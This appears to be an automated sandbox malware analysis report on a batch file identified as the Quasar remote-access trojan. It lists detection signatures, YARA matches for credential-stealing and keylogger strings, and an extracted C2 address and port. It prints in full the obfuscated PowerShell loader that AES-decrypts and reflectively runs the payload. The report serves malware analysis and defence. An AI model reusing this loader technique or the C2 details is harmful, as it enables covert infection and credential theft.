Windows Analysis Report
deneme.bat

Overview

General Information

Sample Name: deneme.bat
Analysis ID: 876996
MD5: 140518164b4e215675accd37cae0d91f
SHA1: 605f1798f9b54b245e35ea516c6e3818463953a7
SHA256: 3411ad812be09efa84946389ddf8fcbc2c1faa7aec4fd419fe02ec748f746abb
Tags: bat

Detection

Quasar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected Quasar RAT
Renames powershell.exe to bypass HIPS
Yara detected Generic Downloader
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • cmd.exe (PID: 2948 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 4652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mode.com (PID: 5932 cmdline: Mode 60,3 MD5: 1A3D2D975EB4A5AF22768F1E23C9A83C)
    • certutil.exe (PID: 6972 cmdline: CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat" MD5: EB199893441CED4BBBCB547FE411CF2D)
    • allah.bat.exe (PID: 6956 cmdline: "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] (''))) MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
Name: Quasar RAT, QuasarRAT
Description: Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
Attribution:
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat

Malware configuration (extracted): {"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "...", "ServerCertificate": "..."}
Yara matches (memory dumps):

Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems), Strings:
  • 0x2a1b9e:$x1: Quasar.Common.Messages
  • 0x2b1ec7:$x1: Quasar.Common.Messages
  • 0x2be4ae:$x4: Uninstalling... good bye :-(
  • 0x2bfc99:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Author: Joe Security
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen, Strings:
  • 0x2bda60:$f1: FileZilla\recentservers.xml
  • 0x2bdaa0:$f2: FileZilla\sitemanager.xml
  • 0x2bdae2:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
  • 0x2bdd2e:$b1: Chrome\User Data\
  • 0x2bdd84:$b1: Chrome\User Data\
  • 0x2be05c:$b2: Mozilla\Firefox\Profiles
  • 0x2be158:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x30f895:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2be2b0:$b4: Opera Software\Opera Stable\Login Data
  • 0x2be36a:$b5: YandexBrowser\User Data\
  • 0x2be3d8:$b5: YandexBrowser\User Data\
  • 0x2be0ac:$s4: logins.json
  • 0x2bdde2:$a1: username_value
  • 0x2bde00:$a2: password_value
  • 0x2be0ec:$a3: encryptedUsername
  • 0x322f75:$a3: encryptedUsername
  • 0x2be110:$a4: encryptedPassword
  • 0x322f93:$a4: encryptedPassword
  • 0x322f11:$a5: httpRealm
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Author: ditekshen, Strings:
  • 0x18e3aa:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
  • 0x2be598:$s3: Process already elevated.
  • 0x2a189d:$s4: get_PotentiallyVulnerablePasswords
  • 0x28b959:$s5: GetKeyloggerLogsDirectory
  • 0x2b1626:$s5: GetKeyloggerLogsDirectory
  • 0x2a18c0:$s6: set_PotentiallyVulnerablePasswords
Yara matches (unpacked PEs):

Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems), Strings:
  • 0x2a1b9e:$x1: Quasar.Common.Messages
  • 0x2b1ec7:$x1: Quasar.Common.Messages
  • 0x2be4ae:$x4: Uninstalling... good bye :-(
  • 0x2bfc99:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Author: Joe Security
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen, Strings:
  • 0x2bda60:$f1: FileZilla\recentservers.xml
  • 0x2bdaa0:$f2: FileZilla\sitemanager.xml
  • 0x2bdae2:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
  • 0x2bdd2e:$b1: Chrome\User Data\
  • 0x2bdd84:$b1: Chrome\User Data\
  • 0x2be05c:$b2: Mozilla\Firefox\Profiles
  • 0x2be158:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x30f895:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x2be2b0:$b4: Opera Software\Opera Stable\Login Data
  • 0x2be36a:$b5: YandexBrowser\User Data\
  • 0x2be3d8:$b5: YandexBrowser\User Data\
  • 0x2be0ac:$s4: logins.json
  • 0x2bdde2:$a1: username_value
  • 0x2bde00:$a2: password_value
  • 0x2be0ec:$a3: encryptedUsername
  • 0x322f75:$a3: encryptedUsername
  • 0x2be110:$a4: encryptedPassword
  • 0x322f93:$a4: encryptedPassword
  • 0x322f11:$a5: httpRealm
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Author: ditekshen, Strings:
  • 0x18e3aa:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
  • 0x2be598:$s3: Process already elevated.
  • 0x2a189d:$s4: get_PotentiallyVulnerablePasswords
  • 0x28b959:$s5: GetKeyloggerLogsDirectory
  • 0x2b1626:$s5: GetKeyloggerLogsDirectory
  • 0x2a18c0:$s6: set_PotentiallyVulnerablePasswords

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "74.234.104.236:3131;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "c60dc807-eaae-43be-9bb5-d598c7ab3dad", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "...", "ServerCertificate": "..."}
Source: deneme.bat, Virustotal: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\allah.bat, Avira: detection malicious, Label: TR/Dldr.Malnote.U
Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR
Source: Binary string: powershell.pdbUGP, source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
Source: Binary string: powershell.pdb, source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr

Networking

Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Malware configuration extractor, URLs: 74.234.104.236
Source: Joe Sandbox View, ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: global traffic, TCP traffic: 192.168.2.3:49702 -> 74.234.104.236:3131
Source: unknown, TCP traffic detected without corresponding DNS query: 74.234.104.236
Source: allah.bat.exe, 00000004.00000002.677997205.0000020E68E37000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50D01000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: allah.bat.exe, 00000004.00000002.633628598.0000020E520F9000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://go.micro
Source: allah.bat.exe, 00000004.00000002.677997205.0000020E68E86000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://go.microsoft.cot
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://ipwho.is/
Source: allah.bat.exe, 00000004.00000002.647921815.0000020E60D70000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.633628598.0000020E518B2000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: allah.bat.exe, 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, allah.bat.exe, 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://stackoverflow.com/q/2152978/23354

E-Banking Fraud

Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.647921815.0000020E62CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.647921815.0000020E62993000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: allah.bat.exe PID: 6956, type: MEMORYSTR

System Summary

Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar infostealer, Author: ditekshen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar infostealer, Author: ditekshen
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar infostealer, Author: ditekshen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems)
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar infostealer, Author: ditekshen
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects QuasarRAT malware, Author: Florian Roth (Nextron Systems)
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables containing common artifcats observed in infostealers, Author: ditekSHen
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Quasar infostealer, Author: ditekshen
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\allah.bat.exe D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
Source: deneme.bat, Virustotal: Detection: 16%
Source: C:\Windows\System32\mode.com, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\mode.com Mode 60,3
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\cmd.exe, File created: C:\Users\user\AppData\Local\Temp\allah.bat.exe
Source: classification engine, Classification label: mal100.troj.evad.winBAT@8/6@0/1
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\c60dc807-eaae-43be-9bb5-d598c7ab3dad
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
